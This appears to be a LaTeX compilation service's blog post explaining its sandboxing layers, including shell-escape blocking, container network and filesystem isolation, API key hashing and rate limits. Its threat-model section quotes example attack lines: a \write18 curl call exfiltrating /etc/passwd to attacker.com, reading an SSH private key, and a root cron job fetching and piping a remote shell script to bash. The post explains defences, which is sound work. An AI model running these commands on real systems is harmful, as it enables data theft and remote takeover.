FormaTeX

\begin{article}

The FormaTeX Security Model: How We Sandbox LaTeX Compilation

LaTeX can execute shell commands, read files, and make network requests. Here is every security layer FormaTeX implements to safely compile untrusted LaTeX at scale.

·7 min read·
The FormaTeX Security Model: How We Sandbox LaTeX Compilation

LaTeX is a Turing-complete language with built-in access to the file system, shell execution, and external processes. Running user-supplied LaTeX on a shared server without a comprehensive security model is a critical vulnerability. This post describes every layer of the FormaTeX security architecture — so you can understand what we protect you from and make an informed decision when choosing a compilation service.

The LaTeX Threat Model

Before describing defenses, it helps to understand what an attacker can do with unrestricted LaTeX access:

Shell execution via \write18:

latex
% Exfiltrates /etc/passwd to an attacker-controlled server
\write18{curl -s https://attacker.com/collect?data=$(cat /etc/passwd | base64)}

File read via \input:

latex
% Reads private key and includes it in the PDF output
\verbatiminput{/home/runner/.ssh/id_rsa}

File write:

latex
% Creates a cron job for persistent access
\newwrite\f
\openout\f=/etc/cron.d/backdoor
\write\f{* * * * * root curl attacker.com/shell.sh | bash}
\closeout\f

Resource exhaustion:

latex
% Infinite recursion — hangs the process indefinitely
\def\recurse{\recurse}
\recurse

Each of these is a real attack. The FormaTeX security model addresses all of them.

Shell-Escape Blocking

The most critical protection. All engines are invoked with shell-escape explicitly disabled:

bash
# pdflatex invocation in production
pdflatex \
  -no-shell-escape \
  -interaction=nonstopmode \
  -halt-on-error \
  document.tex

The -no-shell-escape flag makes \write18 a no-op. No shell commands execute, regardless of what the LaTeX source contains.

For xelatex and lualatex, the equivalent restriction is applied. For latexmk, the underlying engine is invoked with shell-escape disabled, and the latexmk process itself cannot be used to enable it.

Some LaTeX tutorials recommend --shell-escape for TikZ externalization or minted syntax highlighting. FormaTeX does not support shell-escape. If your document requires it, you will need to externalize diagrams before sending, or use an alternative highlighting package.

Input Sanitization

Before compilation begins, the input is validated:

  • Content-type check — only JSON with content (string) and engine (enum) fields are accepted
  • Size limits — plan-based input size limits (1 MB free, 10 MB Pro, 25 MB Max, 50 MB Enterprise) prevent memory exhaustion
  • Engine validation — only the four supported engine names are accepted; no other binary names can be injected

The content itself is not filtered — LaTeX is not sanitized line-by-line, because LaTeX macros are too expressive for safe filtering. Instead, the compilation environment is isolated so that any LaTeX source, no matter how malicious, cannot affect the host system.

Network Isolation

Each compilation job runs in a container with no network access:

bash
# Container network policy
--network none

No outbound HTTP requests, no DNS resolution, no access to internal services. Even with shell-escape somehow re-enabled, curl, wget, and netcat cannot reach any external host.

This prevents:

  • Data exfiltration via HTTP callbacks
  • Access to cloud metadata services (AWS instance metadata, GCP metadata)
  • Access to internal database or Redis endpoints

File System Isolation

Every compilation runs in an ephemeral container with a fresh, empty working directory:

  • No persistent storage — each job starts with a clean filesystem
  • No cross-job access — job N cannot read files from job N-1
  • No host filesystem — the container filesystem is separate from the host
  • Read-only root — only the temp compilation directory is writable

\input{/etc/passwd} fails because /etc/passwd does not exist in the isolated container filesystem. The only files available are those explicitly provided in the API request.

API Key Hashing

API keys are never stored in plaintext. When you create a key:

  1. FormaTeX generates a cryptographically random key
  2. The raw key is shown to you once — it is never stored
  3. A SHA-256 hash of the key is stored in the database
  4. On each request, the provided key is hashed and compared to the stored hash

If the FormaTeX database were compromised, the attacker would obtain SHA-256 hashes — not usable API keys. There is no way to reverse a SHA-256 hash to recover the original key.

go
// Simplified key verification
func verifyKey(rawKey string, storedHash string) bool {
    computed := sha256.Sum256([]byte(rawKey))
    return hex.EncodeToString(computed[:]) == storedHash
}

Rate Limiting

Rate limiting is enforced at two levels:

Per-key rate limiting — each API key has its own request rate tracked in Redis. Exceeding the rate limit returns 429 Too Many Requests.

Plan-based monthly limits — each plan has a monthly compilation limit. Free plan is a hard block (compilations fail after the limit). Paid plans are soft limits (overage is tracked but compilations continue).

This prevents:

  • Credential stuffing attacks from exhausting compilation resources
  • A single compromised key from overwhelming the system
  • Denial-of-service via compilation flood

Resource Limits per Job

Each compilation job runs with enforced process-level limits:

ResourceLimit
CPU timePlan-based timeout (30–300s)
MemoryFixed per-job limit
Output file sizePlan-based (1–50 MB)
Temp file countFixed maximum
Disk writesFixed maximum

These limits are enforced at the OS/container level — not just by a LaTeX timeout flag. A LaTeX document that enters an infinite loop is killed by the timeout enforcer, not just paused.

Zero Data Retention

FormaTeX does not store your LaTeX source or output PDF:

  • Input LaTeX is written to an ephemeral temp directory for the duration of compilation
  • The output PDF is streamed directly in the HTTP response
  • Both are deleted immediately when the job completes, regardless of success or failure
  • Compilation metadata (engine, status, duration, input size) is stored in compilation_logs for usage tracking — the content is never stored

Your document content never persists on FormaTeX infrastructure.

The compilation_logs table stores: timestamp, engine used, status (success/failure), duration in milliseconds, and input size in bytes. It never stores the LaTeX source or any content from your documents.

Summary

ThreatDefense
\write18 shell execution-no-shell-escape flag on all engines
File system read (\input)Container isolation — empty filesystem
File system writeRead-only container root
Network exfiltration--network none on all compilation containers
Resource exhaustionCPU + memory + timeout limits at OS level
API key theftSHA-256 hashing — raw keys never stored
Brute forceRate limiting per key + per plan
Data exposureZero retention — content deleted after response

Webhook Security

FormaTeX supports webhooks for async compilation notifications. Webhook delivery includes its own security model:

  • URL validation — webhook URLs are validated on creation to prevent SSRF attacks
  • Delivery signing — each webhook payload is signed so your receiver can verify it originated from FormaTeX
  • Retry logic — failed deliveries are retried with exponential backoff, preventing thundering herd issues
  • HTTPS enforcement — webhook URLs must use HTTPS in production

Webhooks are managed via authenticated CRUD endpoints (POST /webhooks, GET /webhooks, DELETE /webhooks/:id), ensuring only the API key owner can configure delivery targets.

Get Started

\end{article}

Back to blog

\related{posts}

One quick thing

We track anonymous usage — page views, feature usage, compilation events — to understand what works and what doesn't. No ads, no personal data, no third-party sharing.

Cookie policy